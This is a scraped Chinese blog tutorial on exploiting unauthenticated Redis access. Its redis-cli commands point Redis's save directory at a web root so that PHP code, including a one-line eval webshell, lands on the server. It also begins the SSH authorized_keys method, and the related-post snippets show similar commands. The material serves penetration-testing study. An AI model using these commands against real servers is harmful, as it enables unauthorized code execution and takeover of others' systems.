利用redis写webshell

最新推荐文章于 2024-06-22 21:21:09 发布
最新推荐文章于 2024-06-22 21:21:09 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: 网络安全 内网渗透 科技公开课程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/103711404
版权
本文介绍了如何通过未授权访问Redis来写入webshell,首先设置Redis目录为网站根目录,写入PHP代码并保存,然后确认webshell成功创建并能正常执行。同时,还讲解了如何生成SSH密钥对,并将公钥写入Redis,配置Redis保存到目标机的SSH authorized_keys文件中,最终实现无密码SSH登录。
摘要由CSDN通过智能技术生成

在redis-cli中写入以下命令:
config set dir /var/www/html/
config set dbfilename redis.php
set webshell “<?php phpinfo(); ?>”
save
在这里插入图片描述

然后看一下目录下是否生成了一个redis.php的文件
在这里插入图片描述

可以看到生成了,查看一下文件的内容
在这里插入图片描述

在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
在这里插入图片描述

Redis 未授权访问配合 SSH key 文件利用

首先在攻击机生成密匙:ssh-keygen –t rsa
在这里插入图片描述

看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容

最低0.47元/天 解锁文章
L18296069161
关注
专栏目录
Redis-Shell
sunhuiliang85的专栏
07-15 6106
Redis Shell 一. redis-cli 1.1 查看redis-cli命令帮助 redis-cli help 查看redis-cli命令帮助 [devuser@iz2ze2ehfvske0t6zflgupz ~]$redis-cli help redis-cli 3.2.4 To get help about Redis commands type: "help
Redis未授权访问漏洞的利用
L18296069161的博客
12-16 203
渗透学习交流群:773617250,群内定期直播,发布相关教程,欢迎咨询群主学习交流!  利用rediswebshell  在redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save  然后看一下...
web中间件漏洞-Redis漏洞未授权访问漏洞-webshellssh公钥
最新发布
Alsn86的博客
06-22 391
利用redis未授权访问、攻击机向服务器写入webshell从服务器查看写入webshell菜刀连接。
六、利用rediswebshell
dahege666的博客
03-02 899
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 服务器配置phpstudy ,截图略过 1. 下载Phpstudy for Linux的bin文件 操作命令: wget -c http://lamp.phpstudy.net/phpstudy.bin 2. 配置phpstudy.bin文件的可执...
rediswebshell
干铮的博客
01-31 790
利用rediswebshell kali@ToolsScannerKali20201:~$ redis-cli -h 192.168.3.28 192.168.3.28:6379> config set dir /usr/local/nginx/html OK 192.168.3.28:6379> config set dbfilename shell.php OK 192.168.3.28:6379> set x "<?php @eval($_REQUEST[123])?&g
Rediswebshell
weixin_54227009的博客
06-06 656
如果网站上开了权限的话,redis连上,可以直接个一句话命令如下:config set dit /var/www/htmlconfig set dbfilename shell.phpset x ""save我这里dir有问题,所以就没实操了
redis权限webshell1
08-08
Redis 权限 webshell1 Redis 是一个开源的内存数据结构存储,用于database、缓存、消息队列等场景。然而,Redis 的默认安装配置存在一个严重的安全问题,即可以匿名访问 Redis 服务器,而无需密码。 问题的根源...
redis写入webshell前提
05-22
首先,为了写入Webshell,攻击者需要能够访问Redis服务器。这可能是通过漏洞利用、弱密码或其他方式获得的。其次,攻击者需要能够在Redis服务器上执行命令来写入Webshell。这通常涉及到Redis的命令注入漏洞或Redis未...
Redis未授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1339
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
Redis Getshell自动化实践之webshell
乐枕的家
07-21 4627
前两篇文章介绍了两种直接root权限getshell的方式,这里介绍通过写入webpage来得到shell的半自动化脚本. 脚本的意义是将误报的可能性降到最低,发现目标并简化手工操作.利用流程1 通过redis未授权访问漏洞,向redis插入一条记录,内容是一句话木马或其他webshell 2 找到web绝对路径,写入webshell 3 菜刀或其它半自动化exp逻辑半自动的原因是最后写入的w
Redis webshell详解
m0_54313550的博客
04-19 506
"set 1 {}".format(shell.replace(" ","${IFS}")), //php代码空格替换成Linux系统服务器识别的空格,redis服务器也是linux系统////python insert 第一个参数0,表示从头部插入,AUTH redis命令 "AUTH{}".format 表示redis认证格式//path="/var/www/html" // url路径下面:/var/www/html ===/(根目录) -----//
SSRF+redis写入webshell
qq_43665434的博客
04-03 1606
晓看红湿处,花重锦官城。 实验环境 主机 角色 描述 centos 受害服务器 运行redisweb服务(redis未授权访问) window 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf和redis未授权访问写入webshell 实验准备 思路: 构造redis数据包,利用redis的数据备份功能,将webshell写入目标服务器(centos)的网站根目录下,然后用菜刀连接获取shell。 条件: 1、运行redis服务的用户必须具有在网站根目录下写入
Redis 未授权访问 写入webshell记录
qq_38053759的博客
04-08 895
Redis 未授权访问 写入webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
redis未授权访问--拿webshell以及实现ssh免密登录
Xiaolisec的博客
08-30 744
redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;提供多种语言的 API,java/c/c++/c#/php/javascript/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值